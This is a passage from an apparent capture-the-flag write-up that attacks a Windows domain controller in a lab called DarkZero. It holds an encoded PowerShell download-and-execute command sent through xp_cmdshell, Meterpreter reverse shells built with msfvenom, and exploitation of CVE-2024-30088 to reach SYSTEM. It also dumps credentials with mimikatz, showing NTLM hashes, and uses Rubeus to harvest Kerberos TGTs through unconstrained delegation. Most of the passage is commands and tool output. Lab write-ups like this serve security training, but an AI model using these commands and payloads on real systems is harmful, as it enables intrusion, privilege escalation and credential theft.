DMAMAA6ADgAMAA4ADAALwAyAHoAaABzAHMAOAAnACkAKQA7AA==
Then back to sql to execute it.
1
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> xp_cmdshell "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtAGIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQBiAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQBiAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMwAwADoAOAAwADgAMAAvADIAegBoAHMAcwA4AC8AWgBIADAAUAA0AFoAeABFAFgAZgB5AFUAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADMAMAA6ADgAMAA4ADAALwAyAHoAaABzAHMAOAAnACkAKQA7AA=="
1
2
3
4
[*] 10.129.121.112 web_delivery - Delivering AMSI Bypass (1392 bytes)
[*] 10.129.121.112 web_delivery - Delivering Payload (3696 bytes)
[*] Sending stage (203846 bytes) to 10.129.121.112
[*] Meterpreter session 1 opened (10.10.16.30:4444 -> 10.129.121.112:54033) at 2025-10-06 06:44:29 -0400
We can see the session 1 has been opened, we can now interact with this one.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: darkzero-ext\svc_sql
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 5
============
Name : Microsoft Hyper-V Network Adapter
Hardware MAC : 00:15:5d:f2:5c:01
MTU : 1500
IPv4 Address : 172.16.20.2
IPv4 Netmask : 255.255.255.0
From here we doing some recon to use if there is some local exploit we can use to escalated in this session.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/script/web_delivery) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.16.30:4444 -> 10.129.121.112:54033 (172.16.20.2)
msf post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(multi/recon/local_exploit_suggester) > run
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
msf post(multi/recon/local_exploit_suggester) > run
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 172.16.20.2 - 206 exploit checks are being tried...
[+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable.
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 49 / 49
[*] 172.16.20.2 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_comhijack No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
19 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
20 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
21 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
22 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
23 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 10.0.20348.2110
24 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
25 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
26 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
27 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
28 exploit/windows/local/cve_2021_40449 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
29 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
30 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
31 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
32 exploit/windows/local/ikeext_service No The check raised an exception.
33 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
34 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2022 (10.0 Build 20348). is not vulnerable
35 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
36 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
37 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
38 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
39 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
40 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
41 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
42 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
43 exploit/windows/local/panda_psevents No The target is not exploitable.
44 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
45 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
46 exploit/windows/local/tokenmagic No The target is not exploitable.
47 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
48 exploit/windows/local/webexec No The check raised an exception.
49 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
[*] Post module execution completed
So we found 9/49 is potientially vulnerable, but the cve_2024_30088_authz_basep
is really solid cause it got version detected and also revision number detected also.
→ We gonna use this cve-2024-30088 to exploit.
cve-2024-30088
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > show options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.147.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.16.30
LHOST => 10.10.16.30
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 5555
LPORT => 5555
msf exploit(windows/local/cve_2024_30088_authz_basep) > set EXITFUNC none
EXITFUNC => none
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.30:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 3988...
[*] 172.16.20.2 - Meterpreter session 1 closed. Reason: Died
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Send timed out
[-] run: Interrupted
After running it, it going really well but it got died so fast that we can not enable to interact with it as system.
→ Thinking about create another shell and upload to our session 1 and execute to reverse shell on the other terminal that the all session will not be deleted.
So first we gonna create test.exe
file via msfvenom
.
1
2
3
4
5
6
7
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.30 LPORT=5555 -f exe -o test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: test.exe
Then we upload to %temp%
folder.
1
2
3
4
5
6
7
8
9
10
msf exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > cd %temp%
meterpreter > pwd
C:\Users\svc_sql\AppData\Local\Temp
meterpreter > upload test.exe
[*] Uploading : /home/kali/HTB_Labs/GACHA_Season9/DarkZero/test.exe -> test.exe
[*] Uploaded 7.00 KiB of 7.00 KiB (100.0%): /home/kali/HTB_Labs/GACHA_Season9/DarkZero/test.exe -> test.exe
[*] Completed : /home/kali/HTB_Labs/GACHA_Season9/DarkZero/test.exe -> test.exe
Now on the other new terminal, we gonna use module exploit/multi/handler
and then executed the test.exe
file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ sudo msfconsole -q
[sudo] password for kali:
[*] Starting persistent handler(s)...
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.16.30
LHOST => 10.10.16.30
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > options
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.30 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.30:5555
msf exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.129.121.112
[*] Meterpreter session 1 opened (10.10.16.30:5555 -> 10.129.121.112:54034) at 2025-10-06 07:29:29 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: darkzero-ext\svc_sql
From what we see, we got our new session 1 but the old session from our previous does not deleted.
→ Now we will run the cve and update the options.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
meterpreter > bg
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.147.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf exploit(windows/local/cve_2024_30088_authz_basep) > set session 1
session => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.16.30
LHOST => 10.10.16.30
msf exploit(windows/local/cve_2024_30088_authz_basep) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.16.30:5555 -> 10.129.121.112:54034 (172.16.20.2)
msf exploit(windows/local/cve_2024_30088_authz_basep) > jobs -l
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://10.10.16.30:5555
msf exploit(windows/local/cve_2024_30088_authz_basep) > set EXITFUNC none
EXITFUNC => none
msf exploit(windows/local/cve_2024_30088_authz_basep) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[-] Handler failed to bind to 10.10.16.30:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 3868...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 828
[+] Successfully retrieved winlogon pid: 608
[*] Exploit completed, but no session was created.
So far so good but there is no session but remember we does have the old one still opened.
1
2
[*] Sending stage (203846 bytes) to 10.129.121.112
[*] Meterpreter session 4 opened (10.10.16.30:4444 -> 10.129.121.112:54054) at 2025-10-06 07:33:47 -0400
There we go, got connected with new session.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf exploit(windows/local/cve_2024_30088_authz_basep) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows darkzero-ext\svc_sql @ DC02 10.10.16.30:4444 -> 10.129.121.112:54084 (172.16.20.2)
4 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DC02 10.10.16.30:4444 -> 10.129.121.112:54054 (172.16.20.2)
msf exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now we are in NT AUTHORITY\SYSTEM
.
1
2
3
4
5
6
7
8
9
meterpreter > shell
Process 4000 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\Users\Administrator\Desktop\user.txt
type c:\Users\Administrator\Desktop\user.txt
8b7e88dd8aa82864debcaa8464f39433
Take away the user.txt
flag.
First sight I thought it would be root flag of the entire machine cause it was in
Administrator
but nope, DC02 just gave user flag. HAHAHAHA :D
Initial Access
So after we gain in the highest level in DC02
, we can do anything like dumping all creds.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator darkzero-ext 6963aad8ba1150192f3ca6341355eb49 93564754ec637caa92a4a9b7e8fc080a7f9fe8bb 07f02ffc631a34deccda1490a397d2b4
DC02$ darkzero-ext 663a13eb19800202721db4225eadc38e be3d502f8be10e1c8731103e904fd3f34b89eaeb be3d502f8be10e1c8731103e904fd3f3
svc_sql darkzero-ext 816ccb849956b531db139346751db65f 55c16d33c59d421bb40ca1f18b5ed46e8dfc403a cda84acbc3e884f322d47ab3922a9450
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator darkzero-ext (null)
DC02$ darkzero-ext (null)
svc_sql darkzero-ext (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator DARKZERO.EXT (null)
DC02$ darkzero.ext a8 e1 9b 6a 34 5f 5f d4 10 5c 5e 66 c3 53 ed dd 7b 57 01 1d ab b7 ae d7 11 ca 85 49 fc 3b 51 2b 12 9a e6 65 19 ff 51 43 b9 ea 9e 50 72 39 4d 69 11 5a 9d 06 36 79 41 31 17 e4 da d2 38 76 cd 52 aa 46 2a 08 bb 41 38 23 8e 3b dc 01 e2 73 83 1c 14 b3 f2 20 27 03 3e fd c7 34 29 5b af 30 76
11 e5 a1 9f 55 d5 eb 58 08 c1 a6 90 a0 28 b1 9d be 0c a6 ef 4d 75 fe 86 4f 91 03 81 50 05 fc e4 1b d7 54 60 1e 55 25 da 29 b9 20 01 ec 17 5c 8c c5 31 88 ef bf 68 06 11 4b b2 7a b2 f2 8e 67 37 ed 82 ab d5 e1 c8 83 f0 2b 65 d6 2c 34 c2 65 9c 8f e8 d8 19 0b 48 23 1d b9 a5 4e 2f 94 41 45
eb f9 e7 0a 26 0d a9 3c 64 05 2c ce fe 55 ff 63 9f 26 eb e2 47 0e 46 25 8e 46 b6 dd df 69 d3 bd fa 8f 9d 38 7c 95 1a 8c c6 ab 3e 72 58 39 b7 30 53 8f
dc02$ DARKZERO.EXT (null)
svc_sql DARKZERO.EXT (null)
But the goal is to also pwned the DC01
as well.
As we know DC01
got unconstrained delegation vulenrable via powerview.py.
→ Let’s double-check with DC02
also.
Unconstrained Delegation
1
2
3
4
5
6
7
8
9
10
PS C:\Windows\system32> Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,servicePrincipalName,Description | Format-List Name,TrustedForDelegation,servicePrincipalName,Description
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,servicePrincipalName,Description | Format-List Name,TrustedForDelegation,servicePrincipalName,Description
Name : DC02
TrustedForDelegation : True
servicePrincipalName : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC02.darkzero.ext,
ldap/DC02.darkzero.ext/ForestDnsZones.darkzero.ext,
ldap/DC02.darkzero.ext/DomainDnsZones.darkzero.ext, TERMSRV/DC02...}
Description :
Okay, so we got TrustedForDelegation
is True
.
→ From here we can do anything to authenticate to DC02
from DC01
, so that the TGT will be cached in DC02
and cause of that we are SYSTEM
, we can extract them out.
We gonna do this with Rubeus.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
meterpreter > upload /usr/share/windows-resources/rubeus/Rubeus.exe
[*] Uploading : /usr/share/windows-resources/rubeus/Rubeus.exe -> Rubeus.exe
[*] Uploaded 271.50 KiB of 271.50 KiB (100.0%): /usr/share/windows-resources/rubeus/Rubeus.exe -> Rubeus.exe
[*] Completed : /usr/share/windows-resources/rubeus/Rubeus.exe -> Rubeus.exe
meterpreter > shell
Process 3908 created.
Channel 4 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\TEMP>dir
dir
Volume in drive C has no label.
Volume Serial Number is E415-87AD
Directory of C:\Windows\TEMP
10/06/2025 05:15 AM <DIR> .
07/30/2025 03:57 PM <DIR> ..
07/29/2025 09:59 AM 12,500 MpCmdRun.log
07/29/2025 12:32 PM 88,836 MpSigStub.log
10/06/2025 05:16 AM 278,016 Rubeus.exe
10/05/2025 03:19 PM 102 silconfig.log
07/30/2025 10:09 AM 196,608 TS_F749.tmp
07/30/2025 10:09 AM 196,608 TS_F7A8.tmp
6 File(s) 772,670 bytes
2 Dir(s) 3,302,645,760 bytes free
We can get this Rubeus.exe
from releases site or if we already download it on our machine, we can use locate
and get the path with .exe
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ locate rubeus
/opt/chainsaw/sigma/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml
/opt/chainsaw/sigma/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml
/opt/chainsaw/sigma/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml
/usr/bin/rubeus
/usr/share/applications/kali-rubeus.desktop
/usr/share/chainsaw/rules/mft/rubeus_mft.yml
/usr/share/doc/rubeus
/usr/share/doc/rubeus/changelog.Debian.gz
/usr/share/doc/rubeus/changelog.gz
/usr/share/doc/rubeus/copyright
/usr/share/icons/hicolor/16x16/apps/kali-rubeus.png
/usr/share/icons/hicolor/22x22/apps/kali-rubeus.png
/usr/share/icons/hicolor/24x24/apps/kali-rubeus.png
/usr/share/icons/hicolor/256x256/apps/kali-rubeus.png
/usr/share/icons/hicolor/32x32/apps/kali-rubeus.png
/usr/share/icons/hicolor/48x48/apps/kali-rubeus.png
/usr/share/icons/hicolor/scalable/apps/kali-rubeus.svg
/usr/share/kali-menu/applications/kali-rubeus.desktop
/usr/share/windows-resources/rubeus
/usr/share/windows-resources/rubeus/Rubeus.exe
/var/cache/apt/archives/rubeus_1.6.4-0kali1_all.deb
/var/lib/dpkg/info/rubeus.list
/var/lib/dpkg/info/rubeus.md5sums
Privilege Escalation
Now using Rubeus to monitor TGTs
Rubeus
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
C:\Windows\TEMP>.\Rubeus.exe monitor /interval:5 /nowrap
.\Rubeus.exe monitor /interval:5 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
[*] 10/6/2025 12:17:37 PM UTC - Found new TGT:
User : DC02$@DARKZERO.EXT
StartTime : 10/6/2025 12:49:27 AM
EndTime : 10/6/2025 10:49:27 AM
RenewTill : 10/12/2025 3:18:44 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD62ZuGmJG0/HYTkHEpCAtXZ7AxWp4ay+2Nx/qFjh62y4L0nfcAj9jc2SQivrKeU0fmU7H1R6PmvMFg9nZxsCqytruLus3vhT3rw+ed1i57+b7jGml5jMy3xxPgmAKhnjz5k9nydNR6FrJrJjtZUdBG7/v5KG7QC+5/yccNXXAK01jmIsDxHfYNSu0n/1GBRjyYU3m/9VeUho4+z3Zuk3WSr1vhwxL7vhxcBFLVqffr+P+ht34YtVcqdhIvFc7KmKRp8EkLCnEsKG8x2mXpVOyvcMQpn4ncIA3QRIxGZQofyuvpaSMgUZCARtQ1GW/hIp0tjuFAWr4750pneGI7AWUvpZV5/wsUEtSbTapKFLKmTb4L9JY9gQ+DoeKKkWBPCK8GwXzCYsFaIpZwzIlgyvQJ1ei16g9I9KXArujj91ircgGOuoZwam21FuBx9epIk11QIXAdptqrbluYPqCcZxmOPFIwKx7rFBgI3+RzUsZwuMNYl9hhf6wXtU/d8jGbqpxVM2JIoCIT0Qvla8sSrmICW2dxVX59H3m0RRZBSsRsHDDsOebOBYZY16VObdJi6tGXAOu77kYNZ0Rhw43orW57Xm/ebJqQjex8eAarO1vEJazBJWyIVK0an51SvwCl2BpbTKBca/OeMnEluJWCVcGQBMNgExvOi8Tb9RDv94DBTAMJ7AY9TKXT0xH3WD1LQw/iAYmS/nXV46cEKqyKyR2noQOw+Ios1nh0w4dFBeCowUNW2XKPvvEMYMmivKw/ShJqGPZmhamEtXBNz3o7nKX73z/3pRVDSjUyZaGWPZ04TBga9vba7pvovSqZ/ylQ2sMapvYVxrYuFNUJ0X9WjwybPWE7hgm3N8EN0WlmCfRXnBKFu70yGY+2VTLTQvloL3lxSjOsLzGRVk0qkIcoqE3jQeYYYmuEH42M+nfB7eyDMK+ZJiGBGVuY4x0OrISmpLohHv1Ll9vrrhatyXFy5wWlofWY3VViqRHYWtkPLiZASoD28LJYDeSGs1+i+qr3oY7aHBTfRLAWY1PoUBNPUON/BY00Hv27OpQQjfQukhIWXpfajlqtUwKZ525JStX5I+oah8/0qhyUJ5UHHwWP6LGPuIvaSQRQiP4SJr0xBWCRJwXw3b6qT26p88fGGlJx3zsf4UXZVOkGNedQZtVD5/zWibp5J7De3voyKg7fVfGyhNH9moghdzzjKRoNl4rpaJGX6WYQtrbFRs1C4YwFatdWgqe7e1nBEqwB8Tl40LuJVoztFbRiVVQt/Z7J/HFjwxiWbJP7ll7d7LVzwsqjvPjQRtJTv/kE7xCj6rw1fqv7ovxnBe5sMJjKZNazku7b03GfpjLk77oilvOIUzYDQBbtV3Ks6HhGDdQbENabq8qyp1uiGSwbqAU3I1mG/oeSVW1xEvMxsz/z8k0LGq2mkqp56Q03cD+6X+ouV+YRoHg+jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCDAt3mwv/h9wKa5ShBM3jRlpbFPfXeUYlARGv9r